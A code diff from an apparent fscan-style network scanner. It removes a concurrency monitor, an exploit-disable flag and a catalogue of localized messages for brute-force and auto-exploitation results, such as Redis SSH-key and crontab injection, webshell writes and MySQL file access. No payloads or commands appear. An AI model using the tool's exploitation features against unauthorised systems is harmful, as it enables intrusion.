Common/ConcurrencyMonitor.go

@@ -1,191 +0,0 @@
-package common
-
-import (
-	"fmt"
-	"sync"
-	"sync/atomic"
-	"github.com/shadow1ng/fscan/common/i18n"
-)
-
-/*
-ConcurrencyMonitor.go - 并发监控器
-
-监控两个层级的并发：
-1. 主扫描器线程数 (-t 参数控制)
-2. 插件内连接线程数 (-mt 参数控制)
-*/
-
-// ConcurrencyMonitor 并发监控器
-type ConcurrencyMonitor struct {
-	// 主扫描器层级
-	activePluginTasks  int64 // 当前活跃的插件任务数
-	totalPluginTasks   int64 // 总插件任务数
-	
-	// 插件内连接层级 (每个插件的连接线程数)
-	pluginConnections  sync.Map // map[string]*PluginConnectionInfo
-	
-	mu sync.RWMutex
-}
-
-// PluginConnectionInfo 单个插件的连接信息
-type PluginConnectionInfo struct {
-	PluginName        string // 插件名称
-	Target            string // 目标地址
-	ActiveConnections int64  // 当前活跃连接数
-	TotalConnections  int64  // 总连接数
-}
-
-var (
-	globalConcurrencyMonitor *ConcurrencyMonitor
-	concurrencyMutex         sync.Once
-)
-
-// GetConcurrencyMonitor 获取全局并发监控器
-func GetConcurrencyMonitor() *ConcurrencyMonitor {
-	concurrencyMutex.Do(func() {
-		globalConcurrencyMonitor = &ConcurrencyMonitor{
-			activePluginTasks: 0,
-			totalPluginTasks:  0,
-		}
-	})
-	return globalConcurrencyMonitor
-}
-
-// =============================================================================
-// 主扫描器层级监控
-// =============================================================================
-
-// StartPluginTask 开始插件任务
-func (m *ConcurrencyMonitor) StartPluginTask() {
-	atomic.AddInt64(&m.activePluginTasks, 1)
-	atomic.AddInt64(&m.totalPluginTasks, 1)
-}
-
-// FinishPluginTask 完成插件任务
-func (m *ConcurrencyMonitor) FinishPluginTask() {
-	atomic.AddInt64(&m.activePluginTasks, -1)
-}
-
-// GetPluginTaskStats 获取插件任务统计
-func (m *ConcurrencyMonitor) GetPluginTaskStats() (active int64, total int64) {
-	return atomic.LoadInt64(&m.activePluginTasks), atomic.LoadInt64(&m.totalPluginTasks)
-}
-
-// =============================================================================
-// 插件内连接层级监控
-// =============================================================================
-
-// StartConnection 开始连接
-func (m *ConcurrencyMonitor) StartConnection(pluginName, target string) {
-	key := fmt.Sprintf("%s@%s", pluginName, target)
-	
-	value, _ := m.pluginConnections.LoadOrStore(key, &PluginConnectionInfo{
-		PluginName: pluginName,
-		Target:     target,
-	})
-	
-	info := value.(*PluginConnectionInfo)
-	atomic.AddInt64(&info.ActiveConnections, 1)
-	atomic.AddInt64(&info.TotalConnections, 1)
-}
-
-// FinishConnection 完成连接
-func (m *ConcurrencyMonitor) FinishConnection(pluginName, target string) {
-	key := fmt.Sprintf("%s@%s", pluginName, target)
-	
-	if value, ok := m.pluginConnections.Load(key); ok {
-		info := value.(*PluginConnectionInfo)
-		atomic.AddInt64(&info.ActiveConnections, -1)
-	}
-}
-
-// GetConnectionStats 获取所有插件连接统计
-func (m *ConcurrencyMonitor) GetConnectionStats() map[string]*PluginConnectionInfo {
-	stats := make(map[string]*PluginConnectionInfo)
-	
-	m.pluginConnections.Range(func(key, value interface{}) bool {
-		keyStr := key.(string)
-		info := value.(*PluginConnectionInfo)
-		
-		// 只返回当前活跃的连接
-		if atomic.LoadInt64(&info.ActiveConnections) > 0 {
-			stats[keyStr] = &PluginConnectionInfo{
-				PluginName:        info.PluginName,
-				Target:            info.Target,
-				ActiveConnections: atomic.LoadInt64(&info.ActiveConnections),
-				TotalConnections:  atomic.LoadInt64(&info.TotalConnections),
-			}
-		}
-		return true
-	})
-	
-	return stats
-}
-
-// GetTotalActiveConnections 获取总活跃连接数
-func (m *ConcurrencyMonitor) GetTotalActiveConnections() int64 {
-	var total int64
-	
-	m.pluginConnections.Range(func(key, value interface{}) bool {
-		info := value.(*PluginConnectionInfo)
-		total += atomic.LoadInt64(&info.ActiveConnections)
-		return true
-	})
-	
-	return total
-}
-
-// Reset 重置监控器
-func (m *ConcurrencyMonitor) Reset() {
-	atomic.StoreInt64(&m.activePluginTasks, 0)
-	atomic.StoreInt64(&m.totalPluginTasks, 0)
-	
-	m.pluginConnections.Range(func(key, value interface{}) bool {
-		m.pluginConnections.Delete(key)
-		return true
-	})
-}
-
-// GetConcurrencyStatus 获取并发状态字符串
-func (m *ConcurrencyMonitor) GetConcurrencyStatus() string {
-	activePlugins, _ := m.GetPluginTaskStats()
-	totalConnections := m.GetTotalActiveConnections()
-	
-	if activePlugins == 0 && totalConnections == 0 {
-		return ""
-	}
-	
-	if totalConnections == 0 {
-		return fmt.Sprintf("%s:%d", i18n.GetText("concurrency_plugin"), activePlugins)
-	}
-	
-	return fmt.Sprintf("%s:%d %s:%d", 
-		i18n.GetText("concurrency_plugin"), activePlugins,
-		i18n.GetText("concurrency_connection"), totalConnections)
-}
-
-// GetDetailedStatus 获取详细的并发状态
-func (m *ConcurrencyMonitor) GetDetailedStatus() string {
-	activePlugins, _ := m.GetPluginTaskStats()
-	connectionStats := m.GetConnectionStats()
-	
-	if activePlugins == 0 && len(connectionStats) == 0 {
-		return i18n.GetText("concurrency_no_active_tasks")
-	}
-	
-	status := fmt.Sprintf("%s: %d", i18n.GetText("concurrency_plugin_tasks"), activePlugins)
-	
-	if len(connectionStats) > 0 {
-		status += " | " + i18n.GetText("concurrency_connection_details") + ": "
-		first := true
-		for _, info := range connectionStats {
-			if !first {
-				status += ", "
-			}
-			status += fmt.Sprintf("%s@%s:%d", info.PluginName, info.Target, info.ActiveConnections)
-			first = false
-		}
-	}
-	
-	return status
-}

Common/Flag.go

@@ -54,7 +54,6 @@ var (
 	RedisWriteFile    string
 	
 	DisableBrute bool
-	DisableExploit bool
 	MaxRetries   int
 	
 	DisableSave   bool
@@ -143,7 +142,7 @@ func Flag(Info *HostInfo) {
 	flag.StringVar(&ScanMode, "m", "all", i18n.GetText("flag_scan_mode"))
 	flag.IntVar(&ThreadNum, "t", 600, i18n.GetText("flag_thread_num"))
 	flag.Int64Var(&Timeout, "time", 3, i18n.GetText("flag_timeout"))
-	flag.IntVar(&ModuleThreadNum, "mt", 50, i18n.GetText("flag_module_thread_num"))
+	flag.IntVar(&ModuleThreadNum, "mt", 10, i18n.GetText("flag_module_thread_num"))
 	flag.Int64Var(&GlobalTimeout, "gt", 180, i18n.GetText("flag_global_timeout"))
 	// LiveTop 参数已移除，改为智能控制
 	flag.BoolVar(&DisablePing, "np", false, i18n.GetText("flag_disable_ping"))
@@ -199,7 +198,6 @@ func Flag(Info *HostInfo) {
 	// 暴力破解控制参数
 	// ═════════════════════════════════════════════════
 	flag.BoolVar(&DisableBrute, "nobr", false, i18n.GetText("flag_disable_brute"))
-	flag.BoolVar(&DisableExploit, "ne", false, i18n.GetText("flag_disable_exploit"))
 	flag.IntVar(&MaxRetries, "retry", 3, i18n.GetText("flag_max_retries"))
 
 	// ═════════════════════════════════════════════════

Common/Parse.go

@@ -392,12 +392,6 @@ func showParseSummary(config *parsers.ParsedConfig) {
 		}
 	}
 
-	// 显示扫描配置
-	LogBase(i18n.GetText("scan_config_thread_num", ThreadNum))
-	LogBase(i18n.GetText("scan_config_timeout", Timeout))
-	LogBase(i18n.GetText("scan_config_module_thread_num", ModuleThreadNum))
-	LogBase(i18n.GetText("scan_config_global_timeout", GlobalTimeout))
-	
 	// 显示网络配置
 	if config.Network != nil {
 		if config.Network.HttpProxy != "" {
@@ -406,6 +400,9 @@ func showParseSummary(config *parsers.ParsedConfig) {
 		if config.Network.Socks5Proxy != "" {
 			LogBase(i18n.GetText("network_socks5_proxy", config.Network.Socks5Proxy))
 		}
+		if config.Network.Timeout > 0 {
+			LogBase(i18n.GetText("network_timeout", config.Network.Timeout))
+		}
 		if config.Network.WebTimeout > 0 {
 			LogBase(i18n.GetText("network_web_timeout", config.Network.WebTimeout))
 		}

Common/ProgressManager.go

@@ -146,9 +146,6 @@ func (pm *ProgressManager) generateProgressBar() string {
 	percentage := float64(pm.current) / float64(pm.total) * 100
 	elapsed := time.Since(pm.startTime)
 	
-	// 获取并发状态
-	concurrencyStatus := GetConcurrencyMonitor().GetConcurrencyStatus()
-	
 	// 计算预估剩余时间
 	var eta string
 	if pm.current > 0 {
@@ -197,16 +194,8 @@ func (pm *ProgressManager) generateProgressBar() string {
 		bar += "|"
 	}
 	
-	// 构建基础进度条
-	baseProgress := fmt.Sprintf("%s %6.1f%% %s (%d/%d)%s%s", 
+	return fmt.Sprintf("%s %6.1f%% %s (%d/%d)%s%s", 
 		pm.description, percentage, bar, pm.current, pm.total, speedStr, eta)
-	
-	// 添加并发状态
-	if concurrencyStatus != "" {
-		return fmt.Sprintf("%s [%s]", baseProgress, concurrencyStatus)
-	}
-	
-	return baseProgress
 }
 
 // showCompletionInfo 显示完成信息

Common/base/Plugin.go

@@ -195,67 +195,6 @@ func RegisterPlugin(name string, plugin ScanPlugin) error {
 	return nil
 }
 
-// Clear 清理所有插件（防止内存泄漏）
-func (pm *PluginManager) Clear() {
-	pm.mu.Lock()
-	defer pm.mu.Unlock()
-	
-	// 清理插件实例
-	for name, plugin := range pm.plugins {
-		// ScanPlugin结构不包含Cleanup方法，直接删除即可
-		_ = plugin // 避免未使用变量警告
-		delete(pm.plugins, name)
-	}
-	
-	// 清理索引
-	for typeKey := range pm.types {
-		delete(pm.types, typeKey)
-	}
-	for portKey := range pm.ports {
-		delete(pm.ports, portKey)
-	}
-	
-	// 清理Legacy管理器
-	for k := range LegacyPluginManager {
-		delete(LegacyPluginManager, k)
-	}
-}
-
-// ClearPluginsByType 清理指定类型的插件
-func (pm *PluginManager) ClearPluginsByType(pluginType string) {
-	pm.mu.Lock()
-	defer pm.mu.Unlock()
-	
-	plugins := pm.types[pluginType]
-	for _, plugin := range plugins {
-		// ScanPlugin结构不包含Cleanup方法，直接删除即可
-		delete(pm.plugins, plugin.Name)
-	}
-	delete(pm.types, pluginType)
-	
-	// 同步清理端口索引
-	for port, portPlugins := range pm.ports {
-		filtered := make([]*ScanPlugin, 0)
-		for _, plugin := range portPlugins {
-			found := false
-			for _, typePlugin := range plugins {
-				if plugin == typePlugin {
-					found = true
-					break
-				}
-			}
-			if !found {
-				filtered = append(filtered, plugin)
-			}
-		}
-		if len(filtered) == 0 {
-			delete(pm.ports, port)
-		} else {
-			pm.ports[port] = filtered
-		}
-	}
-}
-
 // GetGlobalPluginManager 方法已删除（死代码清理）
 
 // 向后兼容的全局变量 (已废弃，建议使用PluginManager)

Common/i18n/init.go

@@ -42,7 +42,4 @@ func loadAllMessages() {
 	
 	// 加载命令行参数消息
 	AddMessages(messages.FlagMessages)
-	
-	// 加载插件相关消息
-	AddMessages(messages.PluginMessages)
 }

Common/i18n/manager.go

@@ -188,19 +188,6 @@ func GetText(key string, args ...interface{}) string {
 	return globalManager.GetText(key, args...)
 }
 
-// GetExploitMethodName 获取利用方法的本地化名称
-func GetExploitMethodName(methodName string) string {
-	// 尝试获取本地化的方法名称
-	key := fmt.Sprintf("exploit_method_name_%s", methodName)
-	localizedName := globalManager.GetText(key)
-	
-	// 如果没有找到对应的本地化名称，返回原始名称
-	if localizedName == key {
-		return methodName
-	}
-	return localizedName
-}
-
 // =============================================================================================
 // 已删除的死代码函数（未使用）：
 // GetGlobalManager, GetLanguage, AddMessage, GetTextWithLanguage,

Common/i18n/messages/flag.go

@@ -194,10 +194,6 @@ var FlagMessages = map[string]map[string]string{
 		LangZH: "禁用暴力破解",
 		LangEN: "Disable brute force",
 	},
-	"flag_disable_exploit": {
-		LangZH: "禁用利用攻击",
-		LangEN: "Disable exploit attacks",
-	},
 	"flag_max_retries": {
 		LangZH: "最大重试次数",
 		LangEN: "Maximum retries",

Common/i18n/messages/plugins.go

@@ -1,631 +0,0 @@
-package messages
-
-/*
-plugins.go - 插件相关消息
-
-包含新插件架构中各种插件的国际化消息定义，
-包括扫描、利用、认证等相关消息。
-*/
-
-// PluginMessages 插件相关消息
-var PluginMessages = map[string]map[string]string{
-	// ========================= 通用插件消息 =========================
-	"plugin_init": {
-		LangZH: "初始化插件: %s",
-		LangEN: "Initializing plugin: %s",
-	},
-	"plugin_scan_start": {
-		LangZH: "开始%s插件扫描: %s",
-		LangEN: "Starting %s plugin scan: %s",
-	},
-	"plugin_scan_success": {
-		LangZH: "%s扫描成功: %s",
-		LangEN: "%s scan successful: %s",
-	},
-	"plugin_scan_failed": {
-		LangZH: "%s插件扫描失败: %v",
-		LangEN: "%s plugin scan failed: %v",
-	},
-	"plugin_exploit_start": {
-		LangZH: "开始%s自动利用: %s",
-		LangEN: "Starting %s auto exploitation: %s",
-	},
-	"plugin_exploit_success": {
-		LangZH: "%s利用成功: %s",
-		LangEN: "%s exploitation successful: %s",
-	},
-	"plugin_exploit_failed": {
-		LangZH: "%s利用失败: %v",
-		LangEN: "%s exploitation failed: %v",
-	},
-	
-	// ========================= 通用成功消息模板 =========================
-	"plugin_login_success": {
-		LangZH: "%s弱密码: %s [%s:%s]",
-		LangEN: "%s weak password: %s [%s:%s]",
-	},
-	"plugin_login_success_passwd_only": {
-		LangZH: "%s弱密码: %s [%s]",
-		LangEN: "%s weak password: %s [%s]",
-	},
-	"plugin_unauthorized_access": {
-		LangZH: "%s未授权访问: %s",
-		LangEN: "%s unauthorized access: %s",
-	},
-	
-	// ========================= 利用(Exploit)消息模板 =========================
-	"exploit_weak_password_success": {
-		LangZH: "%s %s 弱密码利用成功",
-		LangEN: "%s %s weak password exploit successful",
-	},
-	"exploit_unauthorized_success": {
-		LangZH: "%s %s 未授权访问利用成功",
-		LangEN: "%s %s unauthorized access exploit successful",
-	},
-	"exploit_command_exec_success": {
-		LangZH: "%s %s 命令执行利用成功",
-		LangEN: "%s %s command execution exploit successful",
-	},
-	"exploit_file_write_success": {
-		LangZH: "%s %s 文件写入利用成功",
-		LangEN: "%s %s file write exploit successful",
-	},
-	"exploit_sql_injection_success": {
-		LangZH: "%s %s SQL注入利用成功",
-		LangEN: "%s %s SQL injection exploit successful",
-	},
-	"exploit_data_extraction_success": {
-		LangZH: "%s %s %s 利用成功",
-		LangEN: "%s %s %s exploit successful",
-	},
-	"exploit_generic_success": {
-		LangZH: "%s %s %s 利用成功",
-		LangEN: "%s %s %s exploit successful",
-	},
-	"exploit_with_output": {
-		LangZH: " 输出: %s",
-		LangEN: " output: %s",
-	},
-	"exploit_files_created": {
-		LangZH: "创建/修改的文件: %v",
-		LangEN: "Files created/modified: %v",
-	},
-	"exploit_shell_obtained": {
-		LangZH: "获得Shell: %s %s:%d 用户:%s",
-		LangEN: "Shell obtained: %s %s:%d user:%s",
-	},
-	
-	// ========================= 利用方法执行消息 =========================
-	"exploit_method_trying": {
-		LangZH: "尝试利用方法: %s",
-		LangEN: "Trying exploit method: %s",
-	},
-	"exploit_method_success": {
-		LangZH: "利用方法 %s 执行成功",
-		LangEN: "Exploit method %s executed successfully",
-	},
-	"exploit_method_failed": {
-		LangZH: "利用方法 %s 执行失败: %v",
-		LangEN: "Exploit method %s failed: %v",
-	},
-	"exploit_method_condition_not_met": {
-		LangZH: "利用方法 %s 前置条件不满足，跳过",
-		LangEN: "Exploit method %s prerequisites not met, skipping",
-	},
-	"exploit_all_methods_failed": {
-		LangZH: "所有利用方法都失败",
-		LangEN: "All exploit methods failed",
-	},
-	
-	// ========================= MySQL利用方法消息 =========================
-	"mysql_version_info": {
-		LangZH: "MySQL版本: %s",
-		LangEN: "MySQL version: %s",
-	},
-	"mysql_current_user": {
-		LangZH: "当前用户: %s",
-		LangEN: "Current user: %s",
-	},
-	"mysql_current_database": {
-		LangZH: "当前数据库: %s",
-		LangEN: "Current database: %s",
-	},
-	"mysql_databases_found": {
-		LangZH: "发现数据库: %s",
-		LangEN: "Databases found: %s",
-	},
-	"mysql_tables_found": {
-		LangZH: "发现表: %v",
-		LangEN: "Tables found: %v",
-	},
-	"mysql_user_privileges": {
-		LangZH: "用户权限: %s",
-		LangEN: "User privileges: %s",
-	},
-	"mysql_file_privilege_detected": {
-		LangZH: "检测到FILE权限，可能支持文件操作",
-		LangEN: "FILE privilege detected, file operations may be supported",
-	},
-	"mysql_file_read_success": {
-		LangZH: "读取文件 %s:\n%s",
-		LangEN: "File %s read:\n%s",
-	},
-	"mysql_file_write_success": {
-		LangZH: "成功写入文件: %s",
-		LangEN: "File written successfully: %s",
-	},
-	"mysql_no_file_privilege": {
-		LangZH: "无法读取任何文件，可能没有FILE权限",
-		LangEN: "Cannot read any files, may lack FILE privilege",
-	},
-	
-	// ========================= Redis利用方法消息 =========================
-	"redis_server_info": {
-		LangZH: "Redis服务器信息: %s",
-		LangEN: "Redis server info: %s",
-	},
-	"redis_config_info": {
-		LangZH: "Redis配置信息: %s",
-		LangEN: "Redis config info: %s",
-	},
-	"redis_keys_found": {
-		LangZH: "发现Redis键: %v",
-		LangEN: "Redis keys found: %v",
-	},
-	"redis_backup_created": {
-		LangZH: "Redis备份创建成功: %s",
-		LangEN: "Redis backup created: %s",
-	},
-	"redis_cron_job_written": {
-		LangZH: "Cron任务写入成功: %s",
-		LangEN: "Cron job written successfully: %s",
-	},
-	"redis_ssh_key_written": {
-		LangZH: "SSH密钥写入成功: %s",
-		LangEN: "SSH key written successfully: %s",
-	},
-	"redis_webshell_written": {
-		LangZH: "Webshell写入成功: %s",
-		LangEN: "Webshell written successfully: %s",
-	},
-	"redis_no_keys_found": {
-		LangZH: "未发现任何Redis键",
-		LangEN: "No Redis keys found",
-	},
-	"redis_write_failed": {
-		LangZH: "Redis写入操作失败",
-		LangEN: "Redis write operation failed",
-	},
-	
-	// ========================= 插件架构消息 =========================
-	"plugin_new_arch_trying": {
-		LangZH: "尝试使用新插件架构: %s",
-		LangEN: "Trying new plugin architecture: %s",
-	},
-	"plugin_new_arch_success": {
-		LangZH: "新插件架构处理成功: %s",
-		LangEN: "New plugin architecture successful: %s",
-	},
-	"plugin_new_arch_fallback": {
-		LangZH: "新插件架构失败，回退到传统实现: %s - %v",
-		LangEN: "New plugin architecture failed, falling back to legacy: %s - %v",
-	},
-	"plugin_legacy_using": {
-		LangZH: "插件 %s 不支持新架构，使用传统实现",
-		LangEN: "Plugin %s not supported in new architecture, using legacy",
-	},
-
-	// ========================= MySQL插件消息 =========================
-	"mysql_scan_start": {
-		LangZH: "开始MySQL扫描: %s",
-		LangEN: "Starting MySQL scan: %s",
-	},
-	"mysql_scan_success": {
-		LangZH: "MySQL弱密码扫描成功: %s [%s:%s]",
-		LangEN: "MySQL weak password scan successful: %s [%s:%s]",
-	},
-	"mysql_service_identified": {
-		LangZH: "MySQL服务识别成功: %s - %s",
-		LangEN: "MySQL service identified: %s - %s",
-	},
-	"mysql_connection_failed": {
-		LangZH: "MySQL连接失败: %v",
-		LangEN: "MySQL connection failed: %v",
-	},
-	"mysql_auth_failed": {
-		LangZH: "MySQL认证失败: %v",
-		LangEN: "MySQL authentication failed: %v",
-	},
-	"mysql_exploit_info_gather": {
-		LangZH: "MySQL信息收集成功",
-		LangEN: "MySQL information gathering successful",
-	},
-	"mysql_exploit_db_enum": {
-		LangZH: "MySQL数据库枚举成功",
-		LangEN: "MySQL database enumeration successful",
-	},
-	"mysql_exploit_file_write": {
-		LangZH: "MySQL文件写入成功: %s",
-		LangEN: "MySQL file write successful: %s",
-	},
-	"mysql_exploit_file_read": {
-		LangZH: "MySQL文件读取成功: %s",
-		LangEN: "MySQL file read successful: %s",
-	},
-
-	// ========================= Redis插件消息 =========================
-	"redis_scan_start": {
-		LangZH: "开始Redis扫描: %s",
-		LangEN: "Starting Redis scan: %s",
-	},
-	"redis_unauth_success": {
-		LangZH: "Redis未授权访问: %s",
-		LangEN: "Redis unauthorized access: %s",
-	},
-	"redis_weak_pwd_success": {
-		LangZH: "Redis弱密码扫描成功: %s [%s]",
-		LangEN: "Redis weak password scan successful: %s [%s]",
-	},
-	"redis_service_identified": {
-		LangZH: "Redis服务识别成功: %s - %s",
-		LangEN: "Redis service identified: %s - %s",
-	},
-	"redis_connection_failed": {
-		LangZH: "Redis连接失败: %v",
-		LangEN: "Redis connection failed: %v",
-	},
-	"redis_auth_failed": {
-		LangZH: "Redis认证失败: %v",
-		LangEN: "Redis authentication failed: %v",
-	},
-	"redis_exploit_file_write": {
-		LangZH: "Redis任意文件写入成功: %s",
-		LangEN: "Redis arbitrary file write successful: %s",
-	},
-	"redis_exploit_ssh_key": {
-		LangZH: "Redis SSH密钥注入成功",
-		LangEN: "Redis SSH key injection successful",
-	},
-	"redis_exploit_crontab": {
-		LangZH: "Redis定时任务注入成功",
-		LangEN: "Redis crontab injection successful",
-	},
-	"redis_exploit_data_extract": {
-		LangZH: "Redis数据提取成功",
-		LangEN: "Redis data extraction successful",
-	},
-
-	// ========================= SSH插件消息 =========================
-	"ssh_scan_start": {
-		LangZH: "开始SSH扫描: %s",
-		LangEN: "Starting SSH scan: %s",
-	},
-	"ssh_key_auth_success": {
-		LangZH: "SSH密钥认证成功: %s [%s]",
-		LangEN: "SSH key authentication successful: %s [%s]",
-	},
-	"ssh_pwd_auth_success": {
-		LangZH: "SSH密码认证成功: %s [%s:%s]",
-		LangEN: "SSH password authentication successful: %s [%s:%s]",
-	},
-	"ssh_service_identified": {
-		LangZH: "SSH服务识别成功: %s - %s",
-		LangEN: "SSH service identified: %s - %s",
-	},
-	"ssh_connection_failed": {
-		LangZH: "SSH连接失败: %v",
-		LangEN: "SSH connection failed: %v",
-	},
-	"ssh_auth_failed": {
-		LangZH: "SSH认证失败: %v",
-		LangEN: "SSH authentication failed: %v",
-	},
-	"ssh_key_read_failed": {
-		LangZH: "读取SSH私钥失败: %v",
-		LangEN: "Failed to read SSH private key: %v",
-	},
-
-	// ========================= 通用错误消息 =========================
-	"plugin_brute_disabled": {
-		LangZH: "暴力破解已禁用",
-		LangEN: "Brute force disabled",
-	},
-	"plugin_no_credentials": {
-		LangZH: "没有可用的凭据",
-		LangEN: "No credentials available",
-	},
-	"plugin_all_creds_failed": {
-		LangZH: "所有凭据扫描失败",
-		LangEN: "All credential scans failed",
-	},
-	"plugin_invalid_port": {
-		LangZH: "无效的端口号: %s",
-		LangEN: "Invalid port number: %s",
-	},
-	"plugin_timeout": {
-		LangZH: "插件扫描超时",
-		LangEN: "Plugin scan timeout",
-	},
-	"plugin_vuln_found": {
-		LangZH: "%s发现漏洞: %s - %s",
-		LangEN: "%s vulnerability found: %s - %s",
-	},
-
-	// ========================= 利用方法名称i18n =========================
-	"exploit_method_name_information_gathering": {
-		LangZH: "信息收集",
-		LangEN: "information_gathering",
-	},
-	"exploit_method_name_database_enumeration": {
-		LangZH: "数据库枚举",
-		LangEN: "database_enumeration", 
-	},
-	"exploit_method_name_privilege_check": {
-		LangZH: "权限检查",
-		LangEN: "privilege_check",
-	},
-	"exploit_method_name_file_read": {
-		LangZH: "文件读取",
-		LangEN: "file_read",
-	},
-	"exploit_method_name_file_write": {
-		LangZH: "文件写入",
-		LangEN: "file_write",
-	},
-	"exploit_method_name_arbitrary_file_write": {
-		LangZH: "任意文件写入",
-		LangEN: "arbitrary_file_write",
-	},
-	"exploit_method_name_ssh_key_write": {
-		LangZH: "SSH密钥写入",
-		LangEN: "ssh_key_write",
-	},
-	"exploit_method_name_crontab_injection": {
-		LangZH: "定时任务注入",
-		LangEN: "crontab_injection",
-	},
-	"exploit_method_name_data_extraction": {
-		LangZH: "数据提取",
-		LangEN: "data_extraction",
-	},
-	"exploit_method_name_system_info": {
-		LangZH: "系统信息收集",
-		LangEN: "system_info",
-	},
-	"exploit_method_name_command_test": {
-		LangZH: "命令执行测试",
-		LangEN: "command_test",
-	},
-	
-	// ========================= SSH利用方法消息 =========================
-	"ssh_command_result": {
-		LangZH: "%s: %s",
-		LangEN: "%s: %s",
-	},
-	"ssh_test_command": {
-		LangZH: "执行命令 '%s': %s",
-		LangEN: "Executed command '%s': %s",
-	},
-	"ssh_sudo_check": {
-		LangZH: "Sudo权限: %s",
-		LangEN: "Sudo privileges: %s",
-	},
-	"ssh_root_access": {
-		LangZH: "检测到root权限访问",
-		LangEN: "Root access detected",
-	},
-	"ssh_user_groups": {
-		LangZH: "用户组: %s",
-		LangEN: "User groups: %s",
-	},
-	
-	// ========================= 利用结果消息 =========================
-	"exploit_result_saved": {
-		LangZH: "利用结果已保存: %s",
-		LangEN: "Exploitation result saved: %s",
-	},
-
-	// ========================= ActiveMQ插件消息 =========================
-	"activemq_scan_start": {
-		LangZH: "开始ActiveMQ扫描: %s",
-		LangEN: "Starting ActiveMQ scan: %s",
-	},
-	"activemq_stomp_scan_success": {
-		LangZH: "ActiveMQ弱密码扫描成功(STOMP): %s [%s:%s]",
-		LangEN: "ActiveMQ weak password scan successful(STOMP): %s [%s:%s]",
-	},
-	"activemq_service_identified": {
-		LangZH: "ActiveMQ服务识别成功: %s (%s) - %s",
-		LangEN: "ActiveMQ service identified: %s (%s) - %s",
-	},
-	"activemq_stomp_auth_success": {
-		LangZH: "ActiveMQ STOMP认证成功: %s@%s:%d",
-		LangEN: "ActiveMQ STOMP authentication successful: %s@%s:%d",
-	},
-	"activemq_connection_failed": {
-		LangZH: "ActiveMQ连接失败: %v",
-		LangEN: "ActiveMQ connection failed: %v",
-	},
-	"activemq_auth_failed": {
-		LangZH: "ActiveMQ认证失败: %v",
-		LangEN: "ActiveMQ authentication failed: %v",
-	},
-	"activemq_stomp_auth_failed": {
-		LangZH: "ActiveMQ STOMP认证失败: %v",
-		LangEN: "ActiveMQ STOMP authentication failed: %v",
-	},
-
-	// ActiveMQ利用方法消息
-	"activemq_exploit_info_gather": {
-		LangZH: "ActiveMQ信息收集成功",
-		LangEN: "ActiveMQ information gathering successful",
-	},
-	"activemq_exploit_message_enum": {
-		LangZH: "ActiveMQ消息枚举成功",
-		LangEN: "ActiveMQ message enumeration successful",
-	},
-	"activemq_exploit_queue_mgmt": {
-		LangZH: "ActiveMQ队列管理成功",
-		LangEN: "ActiveMQ queue management successful",
-	},
-	"activemq_exploit_config_dump": {
-		LangZH: "ActiveMQ配置转储成功",
-		LangEN: "ActiveMQ configuration dump successful",
-	},
-	"activemq_queues_found": {
-		LangZH: "发现ActiveMQ队列: %s",
-		LangEN: "ActiveMQ queues found: %s",
-	},
-	"activemq_topics_found": {
-		LangZH: "发现ActiveMQ主题: %s",
-		LangEN: "ActiveMQ topics found: %s",
-	},
-	"activemq_queue_created": {
-		LangZH: "成功创建测试队列: %s",
-		LangEN: "Test queue created successfully: %s",
-	},
-	"activemq_message_sent": {
-		LangZH: "消息发送成功到队列: %s",
-		LangEN: "Message sent successfully to queue: %s",
-	},
-	"activemq_version_info": {
-		LangZH: "ActiveMQ版本: %s",
-		LangEN: "ActiveMQ version: %s",
-	},
-	"activemq_broker_info": {
-		LangZH: "ActiveMQ Broker信息: %s",
-		LangEN: "ActiveMQ Broker info: %s",
-	},
-	"activemq_protocol_detected": {
-		LangZH: "检测到ActiveMQ协议: %s",
-		LangEN: "ActiveMQ protocol detected: %s",
-	},
-
-	// ActiveMQ利用方法名称
-	"exploit_method_name_activemq_info_gather": {
-		LangZH: "信息收集",
-		LangEN: "Information Gathering",
-	},
-	"exploit_method_name_activemq_message_enum": {
-		LangZH: "消息枚举", 
-		LangEN: "Message Enumeration",
-	},
-	"exploit_method_name_activemq_queue_mgmt": {
-		LangZH: "队列管理",
-		LangEN: "Queue Management",
-	},
-	"exploit_method_name_activemq_config_dump": {
-		LangZH: "配置转储",
-		LangEN: "Configuration Dump",
-	},
-
-	// ========================= FTP插件消息 =========================
-	"ftp_scan_start": {
-		LangZH: "开始FTP扫描: %s",
-		LangEN: "Starting FTP scan: %s",
-	},
-	"ftp_anonymous_success": {
-		LangZH: "FTP匿名访问: %s",
-		LangEN: "FTP anonymous access: %s",
-	},
-	"ftp_weak_pwd_success": {
-		LangZH: "FTP弱密码: %s [%s:%s]",
-		LangEN: "FTP weak password: %s [%s:%s]",
-	},
-	"ftp_service_identified": {
-		LangZH: "FTP服务识别成功: %s - %s",
-		LangEN: "FTP service identified: %s - %s",
-	},
-	"ftp_connection_failed": {
-		LangZH: "FTP连接失败: %v",
-		LangEN: "FTP connection failed: %v",
-	},
-	"ftp_auth_failed": {
-		LangZH: "FTP认证失败: %v",
-		LangEN: "FTP authentication failed: %v",
-	},
-
-	// FTP利用方法消息
-	"ftp_exploit_dir_enum": {
-		LangZH: "FTP目录枚举成功",
-		LangEN: "FTP directory enumeration successful",
-	},
-	"ftp_exploit_file_download": {
-		LangZH: "FTP文件下载测试成功",
-		LangEN: "FTP file download test successful",
-	},
-	"ftp_exploit_file_upload": {
-		LangZH: "FTP文件上传测试成功",
-		LangEN: "FTP file upload test successful",
-	},
-	
-	// ========================= IMAP插件消息 =========================
-	"imap_weak_pwd_success": {
-		LangZH: "IMAP弱密码: %s [%s:%s]",
-		LangEN: "IMAP weak password: %s [%s:%s]",
-	},
-	"imap_service_identified": {
-		LangZH: "IMAP服务识别成功: %s - %s",
-		LangEN: "IMAP service identified: %s - %s",
-	},
-	"imap_connection_failed": {
-		LangZH: "IMAP连接失败: %v",
-		LangEN: "IMAP connection failed: %v",
-	},
-	"imap_auth_failed": {
-		LangZH: "IMAP认证失败: %v",
-		LangEN: "IMAP authentication failed: %v",
-	},
-	
-	// ========================= Kafka插件消息 =========================
-	"kafka_weak_pwd_success": {
-		LangZH: "Kafka弱密码: %s [%s:%s]",
-		LangEN: "Kafka weak password: %s [%s:%s]",
-	},
-	"kafka_unauth_access": {
-		LangZH: "Kafka服务 %s 无需认证即可访问",
-		LangEN: "Kafka service %s allows unauthorized access",
-	},
-	"kafka_service_identified": {
-		LangZH: "Kafka服务识别成功: %s - %s",
-		LangEN: "Kafka service identified: %s - %s",
-	},
-	"kafka_connection_failed": {
-		LangZH: "Kafka连接失败: %v",
-		LangEN: "Kafka connection failed: %v",
-	},
